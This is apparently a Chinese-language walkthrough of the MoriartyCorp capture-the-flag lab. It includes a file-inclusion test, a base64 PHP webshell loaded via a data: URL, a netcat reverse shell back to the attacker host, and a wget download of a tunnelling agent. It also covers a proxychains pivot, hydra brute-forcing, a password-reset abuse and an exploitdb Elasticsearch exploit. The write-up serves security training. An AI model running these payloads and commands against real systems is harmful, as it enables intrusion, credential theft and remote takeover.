靶机介绍
1)靶机名称:3-Free-MoriartyCorp
2)难度级别:中-高
3)靶机背景介绍:
①你作为一名特工,协助调查世界最大军火商的非法交易
②本次靶机共有6个任务,每完成一个任务并提交flag,则解锁下一个任务
③8000端口用于提交flag和提示下一关信息,不得对8000端口展开攻击
④靶场环境基于Docker容器打造
⑤美观的flag都以#_flag.txt格式存在于目标系统中
⑥flag提交方式为flag{}
4)课程来源:https://www.aqniukt.com/goods/show/2434?targetId=16289&preview=0
5)靶机地址:链接:https://pan.baidu.com/s/1digsxLOoLd0LoQjrp4OZ8g 提取码:yk91
打靶过程:
1)因靶机通过仅主机方式与宿主机连接,因此可通过二层地址发现的方式,找到靶机的IP地址
#arp-scan -l 192.168.56.0/24
2)对靶机进行全端口扫描
# nmap -p- 192.168.56.106
3)通过靶机提示,方式IP:8000端口对应的web页面
4)通过上述页面提示,复制页面flag{start}开启靶机,开启第一个任务
5)通过上述页面提示,可以发现该靶机对公网开放了一个80端口,此时对80端口进行扫描
# nmap -p80 192.168.56.106
由此可以得出,靶机的处理方法:提交一个flag,就会开启下一关的任务
6)通过IP:80访问WEB页面,通过观察页面直接发现不了任何信息
7)通过点击Blog post 1或者Blog post 1,发现URL出现了变化
8)通过URL发现,该页面可能存在文件包含漏洞,对其进行 基本测试
http://192.168.56.106/?file=../../../../etc/passwd
通过测试发现,确实存在文件包含漏洞
9)对文件包含漏洞进行利用:加载自己的webshell,进行漏洞的反弹,在kali主机上获取一个反弹的shell
浏览器:
http://192.168.56.106/?file=data:/text/plain;base64,PD9waHAgJHZhcj1zaGVsbF9leGVjKCRfR0VUWydjbWQnXSk7IGVjaG8gJHZhciA/Pg==&cmd=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+192.168.56.103+1337+>/tmp/f
kali主机:
nc -lvvp 1337
10)通过反弹shell,输入命令,查看到在根用户下存在第一个flag文件
11)将获取到的flag,提交至IP:8000端口中,解锁一下任务
12)按照页面提示信息,下一任务是为了攻击该企业的内部网络,且内部网络地址范围为172.17.0.3-254
注:因为是内网地址段,所以通过kaLi无法直接访问到内网主机,此时可通过隧道代理的技术手段穿透内网,使得可以在kali主机上直接访问内容,此处使用Venom隧道连接工具
下载地址:https://github.com/Dliv3/Venom/releases
13)通过前期信息搜集发现目标主机是Linux主机,所以把针对Linux系统的代理客户端程序传输到目标服务器上,然后利用客户端程序与目标系统建立一条隧道,从而穿透内网,先Kali主机搭建web服务,将客户端程序下载至目标服务器
# cp agent_linux_x64 /var/www/html
# systemctl restart apache2
14)通过第十步反弹的webshell,下载客户端程序
$ wget http://192.168.56.103/agent_linux_x64
15)在kali主机启动隧道的服务端程序(监听9999端口)
# ./admin_linux_x64 -lport 9999
16)启动客户端程序,同时指定服务器端的Ip地址,kali服务器端的监听端口
$ chmod +x agent_linux_x64
$ ./agent_linux_x64 -rhost 192.168.56.103 -rport 9999
此时服务器显示连接成功
17)在服务器端,输入shouw命令,发现第一跳节点已出现,然后进入节点1,开启一个本地的sockes监听端口1080,这样就在kali服务端又开启一个监听端口
>>> show
>>> goto 1
>>> socks 1080
18)上述步骤完成后,在kali主机配置proxychains,利用proxychains的代理功能,让kali上的所有工具都可以利用代理去穿透目标系统的内网(在最后一行修改代理服务器的IP地址)
# vi /etc/proxychains4.conf
最后一行编辑:socks5 127.0.0.1 1080
注释DNS代理:#proxy_dns
19)配置完成后,就可以挂着proxychains去扫描目标系统的内网,此处使用nmap扫描目标系统的内网网段的常用端口
# proxychains nmap 172.17.0.3-254 -p80,22,44
20)通过上述扫描发现开放了172.17.0.4:80,对其进行访问,访问时需要在浏览器配置代理
访问出现如下界面
21)在上述页面中,可以上传文件,但是上传文件时,需要输入密码,此时通过busuit对其进行暴力破解。问题:当浏览器把代理指向Burp后,浏览器就失去了穿透内网的能力,因为要访问内网,必须要挂之前建立前的隧道代理(socks代理),为解决该问题,需要在burp中配置二级代理
配置完成后,访问网页时,先通过burp代理,再通过socks代理
22)此时可正常访问,上传webshell文件,并进行提交,提交时通过Burp抓包
23)对密码进行暴力破解,破解出密码为password,同时可以查看到上传的目录
http://172.17.0.4/photo/22/shell.php
24)通过中国蚁剑进行webshell连接,需要先设置中国蚁剑的代理为socks代理,保存后,添加上述连接,连接至服务器后,即可获取到flag
蚁剑加载器:https://github.com/AntSwordProject/AntSword-Loader
蚁剑源码:https://gitcode.net/mirrors/antswordproject/antsword?utm_source=csdn_github_accelerator
25)将flag在IP:8000处进行提交,进入下一个任务,根据任务提示,页面告诉我们已经有一名特工已经进入目标服务器中,且在目标服务中发现了一些账号和密码,同时提示我们,目标系统上有一个SSH的server,可利用上述用户和密码登录至服务器中,但是目标ssh服务器的IP地址需要自己发现:现在内网中发现开启了22端口的主机172.17.0.5
#nmap -p22 -ST -Pn 172.17.0.3-254
26)形成用户名和密码文件
27)通过hydra进行暴力破解
# proxychains hydra -L users.txt -P password.txt ssh://172.17.0.5
28)通过ssh用户名和密码登录目标服务器后,查看到flag
flag{what_weapons}
29)通过上述提示可知某个主机没有开放80端口,但是开放了443,8000,8080,8888中的某个端口,继续通过扫描发现
#proxychains nmap -p443,8000,8080,8888 -sT -Pn 172.17.0.3-254
30)通过访问发现是一个类似聊天室的页面,输入上述提示中的用户名和密码
http://172.17.0.6:8000
31)点击上面chat按钮,发现了admin用户和buyer13的聊天记录
32)点击修改密码操作,发现此处存在任意密码修改漏洞,可以直接修改管理员密码:抓取数据包后,修改用户名为admin,修改admin用户名密码为123
33)重新访问网页,输入修改后的用户名和密码,在聊天室中发现了flag
34)通过上述提示发现,存在一个elasticsearch的服务器,因此对9200端口进行扫描
#proxychains nmap -p9200 -sT -Pn 172.17.0.3-20
35)通过浏览器进行访问,elasticsearch的版本
36)通过kali搜索elasticsearch的可能利用的漏洞
# searchsploit elasticsearch
37)利用代码,获取falg
# proxychains python2 /usr/share/exploitdb/exploits/linux/remote/36337 172.17.0.7
